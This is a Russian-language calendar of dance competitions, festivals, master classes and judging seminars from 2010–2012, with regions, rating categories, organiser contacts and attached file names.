 город-2012.doc

07.10.2012—08.09.2012 Открытый Чемпионат Владимирской области Владимирская область
Владимир
Рейтинг Б
8 915 752 76 60
08.09.2012—09.09.2012 Серия мастер-классов "ТАНЦМАСТЕР" Владимирская область
Владимир
Мастер-класс
8 910 770 04 05
12.06.2012—12.06.2012 Городской турнир по Стрит дисциплинам, танцевальному шоу, черлидингу, народному и эстрадному танцу « Аква- Мега- Танцы» Ростовская область
Ростов-на-Дону
Межрегиональный Кубок

Коченов Сергей 8 918 531 5001

mcrostov@narod.ru

01.06.2012—03.06.2012 «ЖАРА 2012» 1-3 июня Российский Рейтинговый Турнир категории «В» по Ориенталь, Танцевальное шоу, Cтрит Краснодарский край
Краснодар
Рейтинг Б

 ГАЛАКТИКА.doc

01.06.2012—03.06.2012 РОССИЙСКИЙ РЕЙТИНГОВЫЙ ТУРНИР КАТЕГОРИИ «Б» «ЖАРА 2012» 1-3 июня 2012 года Краснодарский край
Краснодар
Рейтинг Б
01.06.2012—03.06.2012 РОССИЙСКИЙ РЕЙТИНГОВЫЙ ТУРНИР КАТЕГОРИИ «Б» «ЖАРА 2012» 1-3 июня 2012 года Краснодарский край
Краснодар
Рейтинг Б

 2012.doc

 2012.doc

27.05.2012—27.05.2012 Кубок ЦФО по Танцевальному ШОУ DANCE-MIX Тульская область
Тула
Рейтинг Б

Организатор Чекмазова Ольга тел. 8-903-421-88-88

  Орг. комитет Баринова Татьяна тел. 8-910-160-85-58

 ДЭНС МИКС 2012.doc

 ДЭНС МИКС 2012.doc

 ДЭНС-МИКС.xls

27.05.2012—27.05.2012 Кубок ЦФО по Танцевальному ШОУ DANCE-MIX Тульская область
Тула
Межрегиональный Кубок

 ДЭНС-МИКС.xls

 ДЭНС МИКС 2012.doc

26.05.2012—26.05.2012 "LAVE DANCE SHOW" Воронежская область
Воронеж
Фестиваль
Экстренная связь: 89202116718 Зубарева Ольга.
E-mail: adrenalin-voronezh@yandex.ru с пометкой «LOVE DANСE SHOW 2012»
Сайт www.ortodance.ru

 26 мая.doc

 заявки_образец_8.xls

20.05.2012—20.05.2012 Всероссийский Рейтинговый турнир категории В по современным танцевальным направлениям Саратовская область
Саратов
Рейтинг Б

Е-mail: Ekzersis-pro@yandex.ru

по тел.-факс: 8(8452) 305-433– Ольга; Алевтина Анатольевна; 

сот- 8-927-223-5808  (93-58-08) – Ольга.

 20 мая 2012.doc

19.05.2012—20.05.2012 Межрегиональный Фестиваль-конкурс « Время танцевать» Ростовская область
Ростов-на-Дону
Конкурс

Плюхина Елена 8 928 157 34 86

orhid-studio@yandex.ru

21.04.2012—22.04.2012 Всероссийский Фестиваль «Танцевальный Олимп» Чемпионаты и Первенства ЮФО по Go-Go и Черлидингу Ростовская область
Ростов-на-Дону
Рейтинг Б

Коченов Сергей  8 918 531 50 01

Доспалова Жанна   8 918 531 51 31

mcrostov@ya.ru

21.04.2012—21.04.2012 1-й межрегиональный открытый чемпионат STREET BOOM 2012 Кировская область
Киров
Межрегиональный Кубок

 

Ворожцова Елена Николаевна

E-mail: helen_dance69@mail.ru

т.8-912-826-26-17


Дополнительная информация 

http://vk.com/kirovorto http://vk.com/streetboom2012

_Street_BOOM.doc

 1.xls

08.04.2012—08.04.2012 Судейский семинар и аттестация на категорию для судей ЮФО Ростовская область
Ростов-на-Дону
Конгресс
Петровская Оксана 8 960 465 72 13
07.04.2012—08.04.2012 "Поколение NEW 12" 6-8 апреля 2012 г. Краснодар Российский рейтинговый турнир по современным танцевальным направлениям Краснодарский край
Краснодар
Рейтинг А

 New - 12.doc

07.04.2012—07.04.2012 Baby Cap Городской турнир по Oriental Ростовская область
Ростов-на-Дону
Конкурс

Лавриненко Людмила 8 902 341 28 52

luchia_lb@mail.ru

31.03.2012—01.04.2012 МЕЖДУНАРОДНЫЙ ФЕСТИВАЛЬ-КОНКУРС ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ РЕЙТИНГ-ТУРНИР КАТЕГОРИИ «В» «Maxima-2012» Волгоградская область
Волгоград
Рейтинг Б

Танцевально-спортивный  клуб  «Maxima». Руководитель - Нагов В.С.

 8-927-504-33-24 (сот.) ,  е-mail: Tsk-maxima81@mail.ru

Танцевально-спортивный  клуб  «Динамо».

 Руководитель - Черников К.П. 8-905-397-95-77(сот.).

MAXIMA LOGO.jpg

 турнира 31 марта-1апреля 2012 г..doc

24.03.2012—24.03.2012 Всероссийский турнир по Индийскому танцу Ростовская область
Ростов-на-Дону
Конкурс

Зеленова Ольга 8 904 506 96 82

dancingqueen2003@inbox.ru

 

23.03.2012—25.03.2012 "SFERA 2012" 23-25 марта г.Краснодар Российский рейтинговый турнир категории "А" ориенталь, стрит, шоу Краснодарский край
Краснодар
Рейтинг А

SFERA%202012!!!!!!!%20(%D0%BD%D0%BE%D0%B2%D0%BE%D0%B5).doc

17.03.2012—18.03.2012 Межрегиональный Фестиваль-конкурс « Золотая Терпсихора» Ростовская область
Ростов-на-Дону
Конкурс

Плюхина Елена 8 928 157 34 86

orhid-studio@yandex.ru

03.03.2012—04.03.2012 « Кубок Тихого Дона» Чемпионаты и Первенства ЮФО по Хаусу, Диско, Танцевальному шоу, Джазу, Модерну, Оriental Классика. Кубки ЮФ Ростовская область
Ростов-на-Дону
Межрегиональный Кубок

Кривчук Александр 8 918 508 98 99

Кривчук Ирина  8 918 508 89 00

Петровская Оксана 8 960 465 72 13

oksana.petrovska@mail.ru

 

04.02.2012—05.02.2012 6-й Открытый Смотр-конкурс "Снежная королева - 2012" Ростовская область
Таганрог
Конкурс

Зеленова Ольга 8 904 506 96 82

dancingqueen2003@inbox.ru

04.02.2012—05.02.2012 Чемпионат ЦФО по ОРИЕНТАЛЬНОМУ танцу Тульская область
Тула
Рейтинг Б

 СКАРАБЕЙ 2012.doc

 СКАРАБЕЙ 2012.doc

28.01.2012—29.01.2011 Сделано в России 2012 Воронежская область
Воронеж
Рейтинг А
Офис:8(4732)70-89-48 Светлана и Нелли (прием заявок) Телефон/факс: +7(4732)72-20-65 с пометкой «Сделано в России 2012г.» Экстренная связь: 89202116718 Зубарева Ольга (директор фестиваля), Belly Dance\Oriental 89202117040 Черняева Оксана. E-mail: adrenalin-voronezh@yandex.ru с пометкой «Сделано в России 2012»

 Сделано в России.doc

 заявки_образец_8.xls

21.01.2012—22.01.2012 Фестиваль-конкурс по Современным Танцевальным Направлениям «Течение Чемпионов» Ростовская область
Ростов-на-Дону
Конкурс
Швыдкой Алексей  8 918 565 29 27
11.01.2012—12.01.2012 Мастер-классы Евгении Максимовой (Москва) в Краснодаре 11-12 января 2012 г. • Двукратная Чемпионка Мира по хип – хопу 2010/2011 Краснодарский край
Краснодар
Мастер-класс

 

 

Заявки на индивидуальные и групповые  уроки принимаются до 5 января 2012г.

Возможно проведение закрытых групп для отдельных коллективов

89184393903     Ignatenko.e@list.ru

 

 

-классы Максимовой Евгении.doc

05.01.2012—05.01.2012 Новогодний бал Танцевальной Организации Ростовской области. Вручение ежегодной премии « Экзерсис» победителям в рейтингах ОРТО Ростовская область
Ростов-на-Дону
Фестиваль

Кривчук Александр 8 918 508 98 99

2495@rambler.ru

10.12.2011—11.12.2011 Танцевальный форум « Евразия 2011» Кубки Ростовской области по всем танцевальным дисциплинам Ростовская область
Ростов-на-Дону
Рейтинг Б

Кривчук Александр 8 918 508 98 99

 

Кривчук Ирина 8 918 508 89 00

 

Петровская Оксана 8 960 465 72 13

 oksana.petrovska@mail.ru
10.12.2011—11.12.2011 Российский Конкурс-Фестиваль "Таланты" Гран-При России.Рейтинг "А"по танцевальному шоу,модерну,джазу Агинский Бурятский АО
Нижний Новгород
Рейтинг А

_таланты-все этапы-2011.doc

26.11.2011—27.11.2011 5 Фестиваль-конкурс «Танцы народов мира» Ростовская область
Таганрог
Городской Кубок

Зеленова Ольга 8 904 506 96 82

dancingqueen2003@inbox.ru

13.11.2011—13.11.2011 Открытый турнир по современным танцевальным напрвлениям Саратовская область
Саратов
Конкурс

Орлова Ольга

тел. (8 8452) 93-58-08

т.-факс (8 8452) 305-433

E-mail: Ekzersis-pro@yandex.ru 

 13 ноября 2011 и заявка.doc

13.11.2011—13.11.2011 Открытый турнир по современным танцевальным направлениям "Экзерсис - PRO" Саратовская область
Саратов
Конкурс

Орлова Ольга

тел. (8 8452) 93-58-08

т.-факс (8 8452) 305-433

E-mail : Ekzersis-pro@yandex.ru 

 13 ноября 2011 и заявка.doc

12.11.2011—13.11.2011 Фестиваль-конкурс по Современным Танцевальным Направлениям «Dance Master» Ростовская область
Ростов-на-Дону
Конкурс

Коченов Сергей 8 918 531 50 01

Доспалова Жанна 8 918 531 51 31

mcrostov@ya.ru

12.11.2011—13.11.2011 «LUNA TOP DANCE-2011» 12-13 ноября 2011 года г. Анапа. Краснодарский край, Городской театр , Крымская 115 Краснодарский край
Анапа
Рейтинг Б

 ТОП ДЭНС ГОТОВОЕ ПОЛОЖЕНИЕ!!!!!!!!!!!!!!!!!!!!.doc

30.10.2011—30.10.2011 Чемпионат Ростовской области по Оriental. Ростовская область
Волгодонск
Областной конкурс

Валюнина Лариса 8 918 551 21 69

lara114@mail.ru

27.10.2011—30.10.2011 27-30октября Санкт-Петербург"Al SALAM 2011" Санкт-Петербург
Санкт-Петербург
Рейтинг А

 Ольга Нур  +7-9052260480

 Шахин Осама: +79119179923

 Береснев Олег +79112098033

 Марина: +79213292929

 Иванов Василий: +79217452846

 Al Salam 2011 (для сайта ОРТО)!.doc

23.10.2011—23.10.2011 РЕГИОНАЛЬНЫЙ ФЕСТИВАЛЬ ИСКУССТВ в городе Тула Открытый Кубок по классическому танцу и модерну Тульская область
Тула
Рейтинг Б

Конкурс эстрадного вокала "ФОРТИССИМО"

Конкурс литературного слова "МИНИАТЮРА"

Открытый Кубок по классической хореографии и модерны "ОБРАЗ ДУШИ"

Конкурс парных танцев "САНТАНА"

 Открытый Кубок по хип-хопу "СТРИТ-ПОП-ДАНС"

Конкурс по стрип пластике "ЭТАЛОН"

Организатор ФЕСТИВАЛЯ ИСКУССТВ Ольга Чекмазова 8-903-421-88-88

e-mail: balletremix@mail.ru

 Осенний Марафон 2011.doc

23.10.2011—23.10.2011 Открытый кубок УрФО по современной хореографии "ОЛИМП ЕВРАЗИИ" Челябинская область
Челябинск
Региональный Кубок

 Олимп евразии.jpg

22.10.2011—23.10.2011 Фестиваль-конкурс по Современным Танцевальным Направлениям Все СТН Ростовская область
Батайск
Конкурс
Ткаченко Михаил 89094287403
22.10.2011—22.10.2011 Фестиваль-конкурс по Современным Танцевальным Направлениям Танцевальное Шоу Ростовская область
Ростов-на-Дону
Конкурс

Плюхина Елена 8 928 157 34 86

orhid-studio@yandex.ru

21.10.2011—23.10.2011 3-Я ДАЛЬНЕВОСТОЧНАЯ ТАНЦЕВАЛЬНАЯ ОЛИМПИАДА Хабаровский край
Хабаровск
Рейтинг Б
Яловой Сергей Епифанович , 89622864630, 89241060356. yalovoy@email.kht.ru

Пол3-яДВТО,ДВFesT,Прил№6,Заявка совр.doc

Пол3-яДВТО,ДВFesT,Прил№7,Заявка парн.танцы 1.doc

3-я ДВТО авг.doc

3-яДВТО,ДВFesT,Прил№4,Совр.пол..doc

3-яДВТО,ДВFesT,Прил№5,Пар.doc

10 информация по конгрессу.doc

3-я ДВТО. 23.10.2011.Итоговые протоколы.doc

16.10.2011—16.10.2011 «ТАНЦУЮЩАЯ СТОЛИЦА», «ЮНЫЙ ТАНЦОР» «ДЕТСКИЙ КУБОК» (BABY CUP) Ленинградская область
Санкт-Петербург
Конкурс

Шакиров Ралиф Радикович   e-mail:  ralifs@yandex.ru

 8(812) 446-65-91;  8(905) 276-40-97;  8(812) 922-54-82;  сайты:  www.spbfdance.ru  www.cidunesco-spb.ru,      www.dancekonkurs-spb.ru

02.10.2011—02.10.2011 ВШТ (Воскресная школа танца / годовая обучающая программа) Нижегородская область
Нижний Новгород
Мастер-класс

www.artsfera.org

artsferann@rambler.ru

02.10.2011—02.09.2011 ОРТО открывает сезон Конкурс "ИСИДА" Ленинградская область
Санкт-Петербург
Конкурс
01.10.2011—02.10.2011 Фестиваль-конкурс по Современным Танцевальным Направлениям г.Кулешовка Ростовская область
Ростов-на-Дону
Конкурс

Пустовойтенко Светлана

8 951 502 62 62

Svet.lanka@inbox.ru

23.09.2011—23.09.2011 Фестиваль хореографического творчества «Ника» на ГРАНТ ФЕДЕРАЦИИ Нижегородская область
Нижний Новгород
Всероссийский конкурс

www.artsfera.org

artsferann@rambler.ru

18.09.2011—18.09.2011 Мастер классы по акробатическому танцу. Мастер классы по мажореткам Ленинградская область
Санкт-Петербург
Мастер-класс

Шакиров Ралиф Радикович   e-mail:  ralifs@yandex.ru

8(812) 446-65-91;  8(905) 276-40-97;  8(812) 922-54-82;  сайты:  

www.spbfdance.ru      www.cidunesco-spb.ru    www.dancekonkurs-spb.ru

18.09.2011—18.09.2011 Общее собрание руководителей танцевальных коллективов Краснодарского края Краснодарский край
Краснодар
Конгресс
03.09.2011—03.09.2011 Общее ежегодное собрание членов Танцевальной организации Ростовской области Ростовская область
Ростов-на-Дону
Конвенция

Кривчук Александр 89195089899

Кривчук Ирина 89185088900

Петровская Оксана 89604657213

05.06.2011—05.06.2011 II Российский танцевальный форум состоится в г. Уфе 5 июня в уникальном современном здании Конгресс-холла. Рейтинг В. Республика Башкортостан
Уфа
Рейтинг Б

ПОЛОЖЕНИЕ ТАНЦ. ФОРУМА.doc

22.05.2011—22.05.2011 Всероссийский турнир по современным танцевальным направлениям Саратовская область
Саратов
Рейтинг Б
Е-mail: Ekzersis-pro@yandex.ru по тел.-факс: 8(8452) 305-433– Ольга; Алевтина Анатольевна;  сот- 8-927-223-5808 (93-58-08) - Ольга

ПОЛОЖЕНИЕ  22 мая 2011 и заявка.doc

21.05.2011—22.05.2011 Конкурс "Жаркие ритмы 2011" г.Благовещенск Амурская область
Благовещенск
Межрегиональный Кубок

Жаркие ритмы 2011 итоговы протоколы.rar

Положение Orientale Жаркие ритмы 2011.doc

15.05.2011—15.05.2011 II Чемпионат и Первенство по современным танцевальным направлениям "Орел-душа России" Орловская область
Орел
Конкурс

mina_78@list.ru, тел.89038823238, (4862) 750815, Двухжилова Марина

Чемпионат Орел ориг..doc

Форма регистрации1_0_0.xls

14.05.2011—14.05.2011 Открытый фестиваль-конкурс "Таланты" 2-ой этап Орловская область
Орел
Конкурс

mina_78@list.ru, тел. 89038823238, (4862)750815 Двухжилова Марина

ОБЩЕРОССИЙСКАЯ ТАНЦЕВАЛЬНАЯ ОРГАНИЗАЦИЯ.doc

24.04.2011—24.04.2011 6-й танцевальный праздник Dancing Party Хабаровский край
Хабаровск
Фестиваль

Положение ДП 2011.doc

Прил.№1 Заявка совр.танцы.doc

Прил.№2 Заявка спец. парн.танцы 1.doc

Итоги ДП 2011.rar

23.04.2011—23.04.2011 Фестиваль- конкурс восточных танцев "Звезда Востока 2011" г.Хабаровск Хабаровский край
Хабаровск
Межрегиональный Кубок

Положение ЗВ 2011.doc

Итоги ЗВ 2011.БЗ.rar

Итоги ЗВ 2011.МЗ.rar

22.04.2011—22.04.2011 2-е ДВ курсы повышения квалификации хореографов Хабаровский край
Хабаровск
Конгресс

2-е ДВ курсы повышения квалификации.doc

16.04.2011—17.04.2011 Фестиваль «Танцевальный Олимп» Первенство ЮФО среди юниоров по Диско. Кубок Ростова по стрит дисциплинам. Ростовская область
Ростов-на-Дону
Областной конкурс

Коченов Сергей 8 918 531 50 01

Доспалова Жанна 8 918 531 51 31

mcrostov@ya.ru

03.04.2011—03.04.2011 Судейский семинар и аттестация на категорию для судей ЮФО Ростовская область
Ростов-на-Дону
Конвенция

Петровская Оксана 8 960 465 72 13

02.04.2011—03.04.2011 "I-ый этап фестиваля "ТАЛАНТЫ" Гран-при Воронежа по Belly Dance. Обучающий конкурс "ДЕБЮТ" Воронежская область
Воронеж
Фестиваль

8-920-229-93-10 

8-960-102-27-50 Митюков Евгений 

 dance-vrn@mail.ru

Конкурс Дебют_положение  02 апреля.doc

ПОЛОЖЕНИЕ Таланты_02 апреля 2011.doc

01.04.2011—03.04.2011 6-Всероссийский рейтинговый фестиваль-конкурс исполнителей современной хореографии "Прикамский Олимп 2011" Пермский край
Пермь
Рейтинг А

Прикамский Олимп 2011 Положение.doc

26.03.2011—26.03.2011 Фестиваль-конкурс «Карнавал звезд» Ростовская область
Таганрог
Фестиваль

Кузюбердина Елена 8 906 416 30 20

lena-karnaval@mail.ru

26.03.2011—26.03.2011 ЧЕМПИОНАТ ЮГА РОССИИ ПО СОВРЕМЕННЫМ ТАНЦАМ ФЕСТИВАЛЬ-КОНКУРС «SFERA» 26 – 27 МАРТА 2011Г. Краснодарский край
Анапа
Рейтинг Б

Игнатенко Евгений Геннадьевич

89184393903

ignatenko.e@list.ru 

SFERA 2011.doc

26.03.2011—26.03.2011 ЧЕМПИОНАТ ЮГА РОССИИ ПО СОВРЕМЕННЫМ ТАНЦАМ ФЕСТИВАЛЬ-КОНКУРС «SFERA» 26 – 27 МАРТА 2011Г. Краснодарский край
Анапа
Рейтинг Б

SFERA 2011.doc

26.03.2011—26.03.2011 27/03/2011 в Уфе - II Чемпионат Башкортостана по совр. танц. направлениям. Рейтинг Поволжья -модерн, фламенко, индийский танец Республика Башкортостан
Уфа
Межрегиональный Кубок
26.03.2011—26.03.2011 ЧЕМПИОНАТ ЮГА РОССИИ ПО СОВРЕМЕННЫМ ТАНЦАМ ФЕСТИВАЛЬ-КОНКУРС «SFERA» 26 – 27 МАРТА 2011Г. Краснодарский край
Австрия
Рейтинг Б


SFERA 2011 танцы.doc

26.03.2011—26.03.2011 ЧЕМПИОНАТ ЮГА РОССИИ ПО СОВРЕМЕННЫМ ТАНЦАМ ФЕСТИВАЛЬ-КОНКУРС «SFERA» 26 – 27 МАРТА 2011Г. Краснодарский край
Анапа
Рейтинг Б

SFERA 2011 танцы.doc

26.03.2011—26.03.2011 МАСТЕР-КЛАССЫ ПО ORIENTAL ОТ НАЙЛИ БАТЫРОВОЙ (г. МОСКВА) 27 МАРТА 2011г. г. Анапа "SFERA 2011" Краснодарский край
Анапа
Мастер-класс

МАСТЕР.doc

19.03.2011—20.03.2011 РОССИЙСКИЙ РЕЙТИНГ-ТУРНИР КАТЕГОРИИ «В» ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ «Кубок ТСК «Maxima-2011» Первенство ЮФО с Волгоградская область
Волгоград
Рейтинг Б

89275043324 Нагов Вячеслав.

TSK-maxima81@mail.ru 

ПОЛОЖЕНИЕ турнира 19-20 марта 2011 г.doc

Форма заявки МАКСИМА-2011.xls

ПРОГРАММА турнира 19-20 марта 2011 г..doc

12.03.2011—13.03.2011 Дальневосточный фестиваль-конкурс современных танцев "Танцевальный Олимп 2011" Хабаровский край
Хабаровск
Межрегиональный Кубок

ТО 2011 .rar

ТО 2011 Итоги.rar

12.03.2011—13.03.2011 Кубок ЮФО по Народному танцу Кубок Ростовской области по Оriental. Первенство Ростовской области среди детей и юниоров по стрит Ростовская область
Ростов-на-Дону
Региональный Кубок

Кривчук Александр 8 918 508 98 99

Кривчук Ирина 8 918 508 89 00

Петровская Оксана 8 960 465 72 13

oksana.petrovska@mail.ru

06.03.2011—07.03.2011 Чемпионат ЮФО по Брейку. Чемпионат Таганрога по Хип-хопу Открытый городской турнир по СТН Ростовская область
Таганрог
Областной конкурс
Некрасов Олег 8 928 900 88 18
05.03.2011—05.03.2011 Фестиваль " Битва Титанов" Воронежская область
Воронеж
Фестиваль

8-903-856-52-91 Панкратов Андрей

Телефон/факс: +7(473)272-20-65 с пометкой «Битва Титанов 2011г.»

Экстренная связь: 8903-856-52-91 Панкратов Андрей (организационные вопросы), 8920-211-67-18 Зубарева Ольга.

Представительство ОРТО в г. Воронеже: 8920-440-10-11 Логвина Ирина (прием заявок).

      E-mail: adrenalin-voronezh@yandex.ru с пометкой «Битва Титанов 2011г.»

Сайт www.ortodance.ru имя блога voronez 

afisha-A6-300dpi-RGB_resize.jpg

ПОЛОЖЕНИЕ битва титанов.doc

26.02.2011—27.02.2011 Фестиваль-конкурс «Золотая Терпсихора» Первенство ЮФО среди юниоров по Классическому танцу. Ростовская область
Ростов-на-Дону
Областной конкурс

Плюхина Елена 8 928 157 34 86

orhid-studio@yandex.ru

19.02.2011—19.02.2011 Конкурс современных танцев "По звездному пути 2011"г.Хабаровск Хабаровский край
Хабаровск
Региональный Кубок

г. Хабаровск, Уссурийский б-р, 20. Тел.:600 – 408; 8-909-870-11-59; 218-000
E-mail: dv-center@yandex.ru

Заявка.doc

Положение ПЗП 2011.doc

По звездному пути Хабаровск итоги.rar

13.02.2011—13.02.2011 Конкурс специальных парных танцев г.Хабаровск Хабаровский край
Хабаровск
Конкурс
89622864630, 89241060356 Яловой С.Е. yalovoy@email.kht.ru

Положение конкурс спт 13.02.2011.doc

Приложение№2 (парные танцы ) 1.doc

08.02.2011—09.02.2011 РАСПИСАНИЕ СУДЕЙСКОГО КОНГРЕССА 8-9 февраля, Москва, "Танцевальная Трилогия" Москва
Москва
Конгресс

расписание-2011_Судейски конгресс.doc

05.02.2011—06.02.2011 Первенство Ростовской области среди юниоров по Оriental.Чемпионат Ростовской области по Эротик шоу.Кубок ЮФО по Индийскому танцу Ростовская область
Таганрог
Областной конкурс

 

Зеленова Ольга 8 904 506 96 82

dancingqueen2003@inbox.ru

 

30.01.2011—30.01.2011 V ВСЕРОССИЙСКИЙ КОНКУРС ПО НАРОДНЫМ НАПРАВЛЕНИЯМ "ТУЛИЦА-2011" Тульская область
Тула
Всероссийский конкурс

Организатор мероприятия Ольга Чекмазова 8-903-421-88-88

http://www.festto.ru/

 

ТУЛИЦА -2011 г.ПОЛОЖЕНИЕ.doc

29.01.2011—30.01.2011 Всероссийский фестиваль-конкурс"Сделано в России 2011" Воронежская область
Воронеж
Рейтинг А

olga.zubareva@mail.ru

8-920-211-67-18 Зубарева Ольга

Заявка на Сделано в России.xls

Положение Сделано в России 2011.doc

Положение Сделано в России 2011.doc

баннер ОРТО.jpg

22.01.2011—23.01.2011 Кубок ЮФО по хип-хопу. Кубок Ростова по Танцевальному шоу. Чемпионат ЮФО по Хаусу и Электрик буги Ростовская область
Ростов-на-Дону
Рейтинг А

Швыдкой Алексей 8 918 565 29 27

19.12.2010—19.12.2010 Фестиваль детского творчества «Мурзилки» (вокал, хореография, детская мода). Возраст: до 8 лет Нижегородская область
Нижний Новгород
Фестиваль

Цылина Майя — Президент НТФ

Тел.: +7-831-466-34-44, моб. +7-902-681-92-90

18.12.2010—19.12.2010 Фестиваль парных т анцев Хабаровский край
Хабаровск
Фестиваль

18 декабря в ночном клубе Великано состоится грандиозная вечеринка и концерт кубинской группы.doc

12.12.2010—12.12.2010 Мастер-классы (Латифа, Наталья Гусева) Воронежская область
Воронеж
Мастер-класс
8-920-229-93-10, 8-960-102-27-50, dance-vrn@mail.ru

мастер-класс.doc

11.12.2010—12.12.2010 Открытый Кубок Воронежа по Oriental "ВОСТОЧНЫЙ БЕРЕГ - 2010" Воронежская область
Воронеж
Городской Кубок

8-920-229-93-10, 8-960-102-27-50

dance-vrn@mail.ru 

Положение_Кубка.doc

11.12.2010—12.12.2010 ОТКРЫТЫЙ КУБОК КРАСНОДАРСКОГО КРАЯ ПО СОВРЕМЕННЫМ ТАНЦАМ 11 – 12 декабря 2010г. Краснодарский край
Австрия
Областной конкурс

ОТКРЫТЫЙ КУБОК КРАСНОДАРСКОГО КРАЯ 11-12 ДЕКАБРЯ.doc

11.12.2010—12.12.2010 Российский Конкурс-Фестиваль «Таланты», Гран-при г. Нижнего Новгорода, 3 этап Нижегородская область
Нижний Новгород
Фестиваль

Баринова Лариса — председатель комитета по сценическим танцам

Моб.: +7-903-604-04-80

04.12.2010—05.12.2010 Курсы повышения квалификации преподавателей Belly Dance Нижегородская область
Нижний Новгород
Конгресс

Карманова Ирина — вице-президент НТФ, Председатель комитета по Belly Dance

Моб.: +7-905-663-10-78

04.12.2010—05.12.2010 Танцевальная Олимпиада Дона. Чемпионат ЮФО по Оriental(классика) Чемпионат Ростовской области по Танцевальному шоу. Ростовская область
Ростов-на-Дону
Рейтинг Б

Кривчук Александр 8 918 508 98 99

Кривчук Ирина 8 918 508 89 00

Петровская Оксана 8 960 465 72 13

oksana.petrovska@mail.ru

04.12.2010—04.12.2010 "Рапсодия 2010" Фестиваль-конкурс "Гран-При г.Санкт-Петербурга" Ленинградская область
Санкт-Петербург
Фестиваль

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

04.12.2010—04.12.2010 Всероссийские соревнования по черлидингу и спортивной хореографии Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

28.11.2010—28.11.2010 "Дебют" Конкурс восточного танца среди начинающих (Oriental) Ленинградская область
Санкт-Петербург
Конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

28.11.2010—28.11.2010 Российский турнир по современным танцевальным направлениям «Кубок Заканалья – 2010» Вологодская область
Волгоград
Всероссийский конкурс

(8442) 67-56-08, 8-906-174-51-65,

                                                       e-mail: DSC-prometey55@yandex.ru

Кубок Заканалья-2010.doc

Положение Кубок Заканалья.doc

27.11.2010—28.11.2010 Кубок Ростовской области по Танцевальному шоу. Первенство Таганрога по Оriental Открытый городской турнир по СТН Ростовская область
Таганрог

Зеленова Ольга 8 904 506 96 82

dancingqueen2003@inbox.ru

26.11.2010—26.11.2010 Всероссийский турнир по эротическому танцевальному шоу "ЭкзерсиС-PRO" Саратовская область
Саратов
Рейтинг Б

E-mail: Ekzersis-pro@yandex.ru

(8 8452) 93-58-08 - Ольга Орлова

т.-факс: (8 8452) 305-433

 

положение по эротическому танцевальному шоу 26 ноября 2010.doc

21.11.2010—21.11.2010 Фестиваль добра «Подари улыбку детям» Нижегородская область
Нижний Новгород
Фестиваль

Карманова Ирина — вице-президент НТФ

Моб.: +7-905-663-10-78

20.11.2010—21.11.2010 Чемпионат Ростовской области по хип-хопу. Первенство Ростовской области среди юниоров по Танцевальному шоу. Открытый городской т Ростовская область
Ростов-на-Дону
Областной конкурс

Коченов Сергей 8 918 531 50 01

Доспалова Жанна 8 918 531 51 31

mcrostov@ya.ru

20.11.2010—21.11.2010 Открытый чемпионат г.Санкт-Петербурга Oriental среди любителей и профессионалов Рейтинг Росии А Ленинградская область
Санкт-Петербург
Рейтинг А

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

16.11.2010—16.11.2010 V ВСЕРОССИЙСКИЙ КОНКУРС ПО НАРОДНЫМ НАПРАВЛЕНИЯМ "ТУЛИЦА-2011" Тульская область
Тула
Всероссийский конкурс

организатор президент Федерации эстрадного и современного т анца Тульской области

Ольга Чекмазова 8-903-421-88-88

e-mail: remix@tula.net

ТУЛИЦА -2011 г.ПОЛОЖЕНИЕ.doc

13.11.2010—14.11.2010 Российский турнир по современным танцевальным направлениям «Кубок Заканалья – 2010». Волгоградская область
Волгоград
Рейтинг Б

Сиротин Василий

Тел.: +7-906-174-51-65

Дом. тел.: (+7-442) 67-56-08

Эл. почта: DSC-prometey55@yandex.ru

07.11.2010—07.11.2010 Чемпионат Ростовской области по Оriental. Кубок ЮФО по Оriental (народный). Первенство ЮФО среди юниоров по Оriental (шоу) Ростовская область
Волгодонск
Рейтинг Б

Валюнина Лариса

8 918 551 21 69

lara114@mail.ru

06.11.2010—06.11.2010 "На берегах Невы" Конкурс ансамблей танцев. Конкурс исполнителей парного шоу Ленинградская область
Санкт-Петербург
Конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

05.11.2010—06.11.2010 "Танцевальная палитра"- Всеросийский конкурс по танцевальному шоу и эстрадному танцу Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

05.11.2010—05.11.2010 "Душа танца" Всероссийский конкурс исполнителей классического танца Ленинградская область
Санкт-Петербург
Всероссийский конкурс

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Международный конкурс Санкт-Петербург 4-6 ноября 2010 года.doc

05.11.2010—05.11.2010 Судейский семинар и лицензирование судей ОРТО Ленинградская область
Санкт-Петербург

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

